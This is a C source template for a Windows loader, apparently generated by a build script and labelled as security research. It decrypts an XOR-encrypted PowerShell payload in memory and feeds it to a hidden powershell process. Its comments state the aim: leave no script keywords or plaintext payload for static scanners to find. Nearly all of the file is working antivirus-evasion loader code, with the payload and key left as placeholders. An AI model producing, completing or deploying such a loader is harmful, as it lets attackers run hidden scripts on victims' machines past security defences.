/*
 * ghost_loader_template.c — XOR-Encrypted PS1 Loader
 * 22DIV / george wu — CSEC research, own hardware only
 *
 * Payload is XOR-encrypted with a random key generated at build time.
 * Static scan: sees encrypted binary noise — no IEX, no Invoke-Expression,
 *              no PowerShell keywords, no recognisable PS1 content.
 * Runtime: decrypts to heap buffer, pipes to powershell stdin, frees.
 *          Zero plaintext payload ever written to disk.
 *
 * Generated by build_ghost_loader.py — do not edit directly.
 */

#include <windows.h>

#define XOR_KEY /* XOR_KEY_VALUE */

static const unsigned char PAYLOAD_ENC[] = {
    /* PAYLOAD_BYTES */
    0x00
};
static const DWORD PAYLOAD_LEN = sizeof(PAYLOAD_ENC) - 1;

int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lpCmd, int nShow)
{
    SECURITY_ATTRIBUTES sa;
    sa.nLength              = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle       = TRUE;

    HANDLE hRead, hWrite;
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
        return 1;
    SetHandleInformation(hWrite, HANDLE_FLAG_INHERIT, 0);

    /* Decrypt payload to heap — plaintext exists only in memory, never on disk */
    unsigned char *payload = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, PAYLOAD_LEN + 1);
    if (!payload) { CloseHandle(hRead); CloseHandle(hWrite); return 1; }
    DWORD i;
    for (i = 0; i < PAYLOAD_LEN; i++)
        payload[i] = PAYLOAD_ENC[i] ^ (unsigned char)XOR_KEY;
    payload[PAYLOAD_LEN] = 0;

    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput   = hRead;
    si.hStdOutput  = INVALID_HANDLE_VALUE;
    si.hStdError   = INVALID_HANDLE_VALUE;
    si.wShowWindow = SW_HIDE;

    wchar_t cmd[] = L"powershell -NoProfile -NonInteractive -WindowStyle Hidden -";

    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE,
                        CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        HeapFree(GetProcessHeap(), 0, payload);
        CloseHandle(hRead);
        CloseHandle(hWrite);
        return 1;
    }

    CloseHandle(hRead);

    DWORD written;
    WriteFile(hWrite, payload, PAYLOAD_LEN, &written, NULL);
    CloseHandle(hWrite);

    /* Wipe and free — plaintext never survives past WriteFile */
    ZeroMemory(payload, PAYLOAD_LEN);
    HeapFree(GetProcessHeap(), 0, payload);

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
